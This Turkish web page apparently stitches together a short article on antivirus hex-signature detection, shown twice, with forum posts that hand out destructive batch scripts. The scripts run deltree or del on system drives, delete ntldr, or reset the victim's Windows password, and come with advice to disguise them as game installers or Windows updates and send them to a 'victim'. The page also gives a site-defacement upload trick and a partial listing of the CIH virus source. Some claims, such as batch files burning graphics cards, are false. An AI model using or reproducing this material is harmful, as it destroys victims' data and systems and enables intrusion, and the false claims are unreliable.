Bu yazımda antivirüs programlarının virüs & trojan vs...' ları nasıl yakaladığından bahsetmek istiyorum. Buna neden de bazı site ve forumlarda insanların başkalarına yanlış bilgiler vermeleridir. Genellikle bu konu hakkındaki yanlış bilgiler de en çok "Hangi AV (Anti Virüs Programı) en iyisi?" tarzındaki forum başlıklarında dolaşıyor.
Bazı kimseler diyor ki şu AV daha iyi. Bak bu şu şu virüsü-trojanı hemen yakaladı diğer AV yakalayamıyor. Aslında burada pek de yanlış bir durum yok gibi görünse de, en iyisi AV'lerin virüsleri nasıl yakaladığını öğrendikten sonra yorum yapmak. Yoksa ağzı olan konuşuyor gibi bir durum çıkıyor ortaya.
Peki AV'ler Virüsleri Nasıl Yakalıyor?
Şimdi öncelikle hiçbir AV sizin yeni yazmış olduğunuz bir virüsü, trojanı vs... yakalayamaz (tespit edemez). Çünkü AV'ler bir programın ne yaptığına, yapısına bakarak onun virüs olduğuna karar vermez (ascii formatında kodlanan bazı zararlı scriptler dışında)! Peki nasıl tanırlar? Öncelikle bir AV firması şüpheli dosya hakkında en az iki rapor almalıdır. Daha sonra ise bu dosyanın analizi yapılır ve bir virüs & trojan vs... olduğuna karar verilince, dosyadan hex imza alınır ve virüs veritabanlarına işlenir. AV progra****z da tarama sırasında makinanızdaki programlarda bu veritabanına işlenen hex imzayı arar ve eşitlik sağlandığında dosyanın infecte bir dosya olduğuna karar verilir.
Yani program ister bilgisayara zarar veren bir virüs olsun, ister bilgisayarınızda arka kapılar (backdoor) açarak dışarıya veri sızdıran bir trojan & worm olsun, bunlar bir Av firmasına rapor edilip, firma tarafından analiz edilip veritabanlarına dahil edilene kadar asla bir AV tarafından tanınamaz. Fakat yukarıda da bahsettiğim gibi bazı zararlı scriptler ascii formatında (düz yazı - derlenmemiş) olduğundan AV bu dosyaya bakarak bazı belli rutinlere göre dosyanın şüpheli bir dosya olduğuna karar verebilir.
Bunun doğruluğuna inanmak için bilgisayara format atan bir program yazın ya da trojan serverı tarzı makinada port açan (sayısı önemli değil; ister 1 olsun ister100 olsun) ve dinlenen komutlara göre dışarıya bilgi sızdıran & makinada zararlı komutlar işleten bir program yazın. Bu programı herhangi bir AV'ye tarattığınızda göreceksiniz ki AV bu programı bir virüs vs... olarak tanıyamayacaktır.
Hadi şimdi biz de bir virüsden hex imza alalım :-))
Ben örnek olarak Lorez virüsünden bir hex imza aldım:
58 FF E0 8B 85 57 17 40 00
50 B9 78 56 34 12 FF 95 E6
16 40 00 89 85 53 17 40 00
83 F8 FF 75 01 C3 6A 20 8B
Şimdi örneğin C'de bir program yazdığımızı varsayalım ve Lorez virüsünden aldığımız bu hex imzayı da programda kullandığımızı düşünelim. Yine örnek vermek gerekirse BYTE tipinde bir diziye kodumuzu yerleştirelim:
BYTE lorez_virusu_imzasi[] = {0x58,0xFF,0xE0,0x8B,0x85,0x57,0x17,0x40,0x00,
0x50,0xB9,0x78,0x56,0x34,0x12,0xFF,0x95,0xE6,
0x16,0x40,0x00,0x89,0x85,0x53,0x17,0x40,0x00,
0x83,0xF8,0xFF,0x75,0x01,0xC3,0x6A,0x20,0x8B};
Bu kodu yazdığınız bir programa dahil edip windows altında derleyip only.exe diye bir dosya oluşturduğunuzu varsayalım. Büyük ihtimalle AV progra****z only.exe dosyasına Win95.Lorez (ya da kendi veritabanlarına nasıl bir isimle kaydetmişlerse) virüsü bulaşmış diye bir uyarı verecektir. Ama siz bunun zararsız bir kod olduğunu anlamışsınızdır sanırım :-))
İşte AV yazılımları da aynı bu şekilde kendilerine rapor edilen dosyaları incelerler ve hex imza veritabanlar oluştururlar. Daha sonra da tarama işlemlerinde dosyalarda bu veritabanındaki imzaları ararlar ve dosyanın infecte olup olmadığına karar vererek disinfecte, silme, karantina vs işlemleri gerçekleştirirler.
Şimdi genel olarak bir AV'nin nasıl çalıştığını öğrenmiş olduk. Peki hangi AV'nin daha iyi olduğuna nasıl karar vereceğiz? Aslında her AV bu kısımda aynı işlemleri yaptığından fark burda yok aslında. Genel olarak AV'lerde sistemi aşırı yavaşlatmaması (Norton yüklü makinanın sürünmesi gibi) ve e-posta denetleme vs gibi ek özellikler ve en az sistem harcayarak en çok fonksiyonu en iyi şekilde başaran bir AV'yi iyi olarak nitelemek mümkün.
Ek olarak kendimce iyi bir AV'ye örnek vermem gerekirse Kaspersky AV'yi rahatlıkla söyleyebilirim. Bu yazılımın diğer AV'lere göre bir artısı daha var ki; o da bu virüslerden vs... alınıp veritabanına işlenen hex imzalara ek olarak, dosyayı birçok exe packer ile ayrı ayrı packlenmiş hallerinden de hex imza alarak veritabanına işlemeleri. Böylece örneğin tanınan bir trojanı (eğer packlenmişse unpack ederek başka bir packerla) packleyerek diğer AV'lere karşı tanınmaz hale getirseniz bile KAV bunu daha önceden kendisi de deneyip vertabanına eklemiş olabileceğinden, diğer AV'ler tanımazken KAV bu infecte dosyayı yine tanıyabilir...
Bu yazımda antivirüs programlarının virüs & trojan vs...' ları nasıl yakaladığından bahsetmek istiyorum. Buna neden de bazı site ve forumlarda insanların başkalarına yanlış bilgiler vermeleridir. Genellikle bu konu hakkındaki yanlış bilgiler de en çok "Hangi AV (Anti Virüs Programı) en iyisi?" tarzındaki forum başlıklarında dolaşıyor.
Bazı kimseler diyor ki şu AV daha iyi. Bak bu şu şu virüsü-trojanı hemen yakaladı diğer AV yakalayamıyor. Aslında burada pek de yanlış bir durum yok gibi görünse de, en iyisi AV'lerin virüsleri nasıl yakaladığını öğrendikten sonra yorum yapmak. Yoksa ağzı olan konuşuyor gibi bir durum çıkıyor ortaya.
Peki AV'ler Virüsleri Nasıl Yakalıyor?
Şimdi öncelikle hiçbir AV sizin yeni yazmış olduğunuz bir virüsü, trojanı vs... yakalayamaz (tespit edemez). Çünkü AV'ler bir programın ne yaptığına, yapısına bakarak onun virüs olduğuna karar vermez (ascii formatında kodlanan bazı zararlı scriptler dışında)! Peki nasıl tanırlar? Öncelikle bir AV firması şüpheli dosya hakkında en az iki rapor almalıdır. Daha sonra ise bu dosyanın analizi yapılır ve bir virüs & trojan vs... olduğuna karar verilince, dosyadan hex imza alınır ve virüs veritabanlarına işlenir. AV progra****z da tarama sırasında makinanızdaki programlarda bu veritabanına işlenen hex imzayı arar ve eşitlik sağlandığında dosyanın infecte bir dosya olduğuna karar verilir.
Yani program ister bilgisayara zarar veren bir virüs olsun, ister bilgisayarınızda arka kapılar (backdoor) açarak dışarıya veri sızdıran bir trojan & worm olsun, bunlar bir Av firmasına rapor edilip, firma tarafından analiz edilip veritabanlarına dahil edilene kadar asla bir AV tarafından tanınamaz. Fakat yukarıda da bahsettiğim gibi bazı zararlı scriptler ascii formatında (düz yazı - derlenmemiş) olduğundan AV bu dosyaya bakarak bazı belli rutinlere göre dosyanın şüpheli bir dosya olduğuna karar verebilir.
Bunun doğruluğuna inanmak için bilgisayara format atan bir program yazın ya da trojan serverı tarzı makinada port açan (sayısı önemli değil; ister 1 olsun ister100 olsun) ve dinlenen komutlara göre dışarıya bilgi sızdıran & makinada zararlı komutlar işleten bir program yazın. Bu programı herhangi bir AV'ye tarattığınızda göreceksiniz ki AV bu programı bir virüs vs... olarak tanıyamayacaktır.
Hadi şimdi biz de bir virüsden hex imza alalım :-))
Ben örnek olarak Lorez virüsünden bir hex imza aldım:
58 FF E0 8B 85 57 17 40 00
50 B9 78 56 34 12 FF 95 E6
16 40 00 89 85 53 17 40 00
83 F8 FF 75 01 C3 6A 20 8B
Şimdi örneğin C'de bir program yazdığımızı varsayalım ve Lorez virüsünden aldığımız bu hex imzayı da programda kullandığımızı düşünelim. Yine örnek vermek gerekirse BYTE tipinde bir diziye kodumuzu yerleştirelim:
BYTE lorez_virusu_imzasi[] = {0x58,0xFF,0xE0,0x8B,0x85,0x57,0x17,0x40,0x00,
0x50,0xB9,0x78,0x56,0x34,0x12,0xFF,0x95,0xE6,
0x16,0x40,0x00,0x89,0x85,0x53,0x17,0x40,0x00,
0x83,0xF8,0xFF,0x75,0x01,0xC3,0x6A,0x20,0x8B};
Bu kodu yazdığınız bir programa dahil edip windows altında derleyip only.exe diye bir dosya oluşturduğunuzu varsayalım. Büyük ihtimalle AV progra****z only.exe dosyasına Win95.Lorez (ya da kendi veritabanlarına nasıl bir isimle kaydetmişlerse) virüsü bulaşmış diye bir uyarı verecektir. Ama siz bunun zararsız bir kod olduğunu anlamışsınızdır sanırım :-))
İşte AV yazılımları da aynı bu şekilde kendilerine rapor edilen dosyaları incelerler ve hex imza veritabanlar oluştururlar. Daha sonra da tarama işlemlerinde dosyalarda bu veritabanındaki imzaları ararlar ve dosyanın infecte olup olmadığına karar vererek disinfecte, silme, karantina vs işlemleri gerçekleştirirler.
Şimdi genel olarak bir AV'nin nasıl çalıştığını öğrenmiş olduk. Peki hangi AV'nin daha iyi olduğuna nasıl karar vereceğiz? Aslında her AV bu kısımda aynı işlemleri yaptığından fark burda yok aslında. Genel olarak AV'lerde sistemi aşırı yavaşlatmaması (Norton yüklü makinanın sürünmesi gibi) ve e-posta denetleme vs gibi ek özellikler ve en az sistem harcayarak en çok fonksiyonu en iyi şekilde başaran bir AV'yi iyi olarak nitelemek mümkün.
Ek olarak kendimce iyi bir AV'ye örnek vermem gerekirse Kaspersky AV'yi rahatlıkla söyleyebilirim. Bu yazılımın diğer AV'lere göre bir artısı daha var ki; o da bu virüslerden vs... alınıp veritabanına işlenen hex imzalara ek olarak, dosyayı birçok exe packer ile ayrı ayrı packlenmiş hallerinden de hex imza alarak veritabanına işlemeleri. Böylece örneğin tanınan bir trojanı (eğer packlenmişse unpack ederek başka bir packerla) packleyerek diğer AV'lere karşı tanınmaz hale getirseniz bile KAV bunu daha önceden kendisi de deneyip vertabanına eklemiş olabileceğinden, diğer AV'ler tanımazken KAV bu infecte dosyayı yine tanıyabilir...
Çalamayacağı şifre yok haze stealer videolu anlatım
https://www.box.com/shared/jae5k4b2gd
Krşı pc ye şifre koyma
Karşı pc ye şifre koy
bunu notepad e yapıştır hasdhajs yazan yere koymak istediğin şifreyi yaz .bat uzantılı olarak kaydet(deneme.bat) zip le sıkıştırın ve kurbana yollayın bunu açtığı zaman pc si kapanır ve şifrelenmiş olur açtığında pc şifre sorar.Eğer şifreyi koyduktan sonra pc nin kapanmasını istemiyorsanız shutdown -r kısmını silin.
Kodlar:
net user %username% hasdhajs
shutdown -r
Site Hacklemek Çok Basit
Merhaba arkadaşlar bazılarınız site ekleyip hava atmak istiyor bunu biliyoruz size bi yardımım dokunacak simdi napıcagımızı anlatıyorum bazılarınız virüs total diye yırtınıcak bu yuzden kodları buraya yazıcam ilk önce googlede aranıcak : inurl:"admin/my_D o c u m e n t s s/my_files" evet boyle bir çok site var ama hacklenmişleride var şifrelileride neyse girdik bi site buluyoruz ve admin/my_d o c u m e n t s/my_files yazan kısımda adminden sonrasını siliyoruz ve rte_popup_File_atch.asp yapıstırıyoruz.... Sonrasında yeni bi sayfa geliyor alt tarafta upload yazıyor ordan indeximizi secip kaydediyoruz site indexleniyor... -Tessekuru çok görme-Alıntı Değildir-- NOT: MY_ D O C U M E N T S YAZAN KISIMLARDAKİ BOŞLUKLARI SİLİN
bütün virüs kodları burada
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
-----------------------------------------
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:eni salak formatı yedin::.
@echo off
--------------------------------------------
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 ÇALIŞIYO
Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak formatı yedin yazıyor".
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin.(mesela:fifa_2005_stream_install)
--------------------------------------------------------------------------
Çalışan ve Gördüğüm en Küçük Virüs
Bu Forumda Verilip verilmediğini tam olarak bilmiyorum ama Suan elimde çok basit yazılmış bir virüs var. Kodlar Aşağıdaki gibidir. Yapmanız gereken tek şey kodları Notepad e yapıştırıp uzantısını .bat olarak ayarlamak. sonra Msn de veya başka bir paylaşım programında başkasına gönderebilirsiniz. Peki virüsümüzün zararı nedir? sorusunun cevabı ise C sürücüsündeki bazı dosyaları siliyor ve 2 sn sonra bilgisayar resetleniyor. taki bir daha açılmamak üzere artık o pc yi format paklar...
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .::Format Down Up Your Sistem Limp_buskuit::.
@echo off
--------------------------------------------------------------------------
çok basit yöntem ile 1 dk içinde virüs yapımı ve sistem çöküyoo
Çok basit yöntemlerle 1 dk içinde format atan(ve attıktan sonra bilgisayar açılmıyor) virus yapabilirsiniz.
Açıklama:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
Kod:
@echo off C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off cls cls @echo .::Seni salak formatı yedin::. @echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
.
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 ÇALIŞIYO
Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak,formatı yedin yazıyor".
Not: "seni salak,formatı yedin" yazan yere kendi mesajınızı yazabilirsiniz...
nasıl .bat yapılır??
ms-dos komut istmini aç dosya neredeyse mesela C:\virus.txt şeklindeyse aynen şunu yazıcaksın...
C:\ren virus.txt virus.bat sonra enter diyoruz..Ve bat. yaptığımız dosyayı herhangi bir şekilde karşıdakine yediriyoruz...
--------------------------------------------------------------
Ekran Karti Yakma(alinti)program Bile Değil Işimizi Yazilarla Hallediyoruz
YAPACAGINIZ İŞLEM
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD gülümse ::.
@echo off3.
METİN SAYFASI AÇIP
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By MaNNeR_Boi yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin.
-------------------------------------------------------------
Format Virüsü
bunu notepade atın .bat olarak kaydedin karşı tarafa yollayın pcsine format atılacak
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
--------------------------------------------------------------------------
HDD yakan virüs
Arkadaşlar size verceğim kodu kişinin çalıştırına yazdırabilirseniz veye notpeda kodu yapıştırıp biçimini bat. e çeviirseniz dosyayı açtığı anda hddsi yanar işte komut
/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
kolay yapmak isterseniz kurbana bunu çalıştıra yaz pc hızlanıo fln derseniz oltaya gelebilir hadi sizze kolay gelsin
--------------------------------------------------------------------------
Karşı pc ye şifre koy
bunu notepad e yapıştır 123456 yazan yere koymak istediğin şifreyi yaz .bat uzantılı olarak kaydet(örnek yun.bat) zip le sıkıştırın ve kurbana yollayın bunu açtığı zaman pc si kapanır ve şifrelenmiş olur açtığında pc şifre sorar.Eğer şifreyi koyduktan sonra pc nin kapanmasını istemiyorsanız shutdown -r kısmını silin.
Kodlar:
net user %username% 123456
shutdown -r
--------------------------------------------------------------------------
MSN de pc yi kitleme
1- öncelikle pc mizden not defteri acalım içine start yazıp kopyalayalım sonra sırasıyla yuzlerce start yazalım.
2- daha sonra kaydet diyelim ve bu dosyayı txt olarak degılde .bat olarak kaydedelim işte size pc dondurucu sakın kendı pcinizde acmayın ama denemek isteyenler açabilir.sonrada .rarlayıp gönderiyoruz karşı taraf açarsa
sonuc olarak pc de durmadan pencereler acılıyor yüzlerce reset atmak zorunda kalıyorsunuz.ekran kartını yoruyor ve yanmasına sebep oluyor.
--------------------------------------------------------------------------
***msn den pc çökertme***
Selam arkadaşlar msn den birine gıcık oluyorsanız işte buyrun.Lütfen masum arkadaşlar üzerinde denemeyin
————————————–
1.Notepad ’i açın.
2.Notepad in içine şunları yazın:
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: BLooDY den formatı yedin::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
NOT:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Windows un önemli bi kaç dosyasını siliyor ve sonra ” BLooDY den formatı yedin yazıyor”.
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin
--------------------------------------------------------------------------
msn patlatma %100 başarı
tek yapmanız gereken kodu arkadaşınıza yedirmek kodu kişisel iletiye yazdığı an msn si kapanıyo ve bidaha açamıyo ( denendi onaylandı )
kod:
--------------------------------------------------------------------------------
ñ¯a_Á¯aÿ±m¯a�ÁÇáç±Çáß±Çá§ÁaÇáDZOÇᯱÇ᧱Çár×ÁÇá+ÑÇ á£áÇá
--------------------------------------------------------------------------
XP SiSTeM ÇöKeRTiCi PRoGRaMsıZ::
ARKADAŞLAR AŞAGIDA VERECEĞİM KODLARI KOPYALIYORUZ.
DAHA SONRA MASA ÜSTÜNE BİR TXT DOSYASI ACIP İÇİNE YAPIŞTIRIYORUZ.
FARKLI KAYDETTEN UZANTISINI .bat OLARAK KAYDEDİYORUZ.
DAHA SONRA DOSYAYI KURBANIMIZA YOLLUYORUZ.
KURBAN DOSYAYI ACINCA
"Microsoft windows XP' nizi güncellemeye devam etmek için lutfen bir tusa basın."
ŞEKLİNDE BİR UYARI İLE KARŞILAŞAK...
PHP KODU:
echo off
echo Microsoft windows XP' nizi güncellemeye devam etmek için lutfen bir tusa basın
echo off
pause
del /f /q d:
del /f /q c:
shutdown -r
shutdown -a buda panzehiri,, eğer kendi pcnizde açarsanız 30 saniye sonra pc format atacaktır sizde bunu panzehir olarak bi yere kaydedin.. sonrada yanlışlıkla açarsanız bunu açın olay bitti
Çernobil Virüs Kodu Ve Virüs Yaratmak!!!
1:Yeni bir metin belgesi açın.
2.Metin belgesine aşağıdaki kodu kopyalayıp yapıştırın.
3:Kopyaladıktan sonra sol üst kçşedeki "dosya" yazan yere basın ve farklı kaydet deyin
5
osya ismini örnek oyun.bat yazın ne isterseniz yazabilirsiniz ama uzantısı .bat şekline olması gerekir ve kaydet deyin virüs hazır.Kendi bilgisayarınızda sakın açmayın çökerr
Kod:
************************************************** *************************
*
; * The Virus Program Information *
;
************************************************** *************************
*
; *
*
; * Designer : CIH Original Place : TTIT of Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Modification Time : 05/21/1998
*
; * *
;
*================================================= =========================
*
; * Modification History *
;
*================================================= =========================
*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
;
*================================================= =========================
*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
;
*================================================= =========================
*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
;
************************************************** *************************
*
.586P
;
************************************************** *************************
*
; * Original PE Executable File(Don't Modify this Section)
*
;
************************************************** *************************
*
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
;
************************************************** *************************
*
; * My Virus Game
*
;
************************************************** *************************
*
; ************************************************** *******
; * Constant Define *
; ************************************************** *******
TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 2
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
IF DEBUG
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h
ELSE
FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h
ENDIF
FileNameBufferSize = 7fh
; ************************************************** *******
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; ************************************************** *******
; * Ring3 Virus Game Initial Program *
; ************************************************** *******
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call [at]0
[at]0:
pop ebx
lea ecx, StopToRunVirusCode-[at]0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-[at]1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
[at]1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; ************************************************** *******
; * Ring0 Virus Game Initial Program *
; ************************************************** *******
MyExceptionHook:
[at]2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
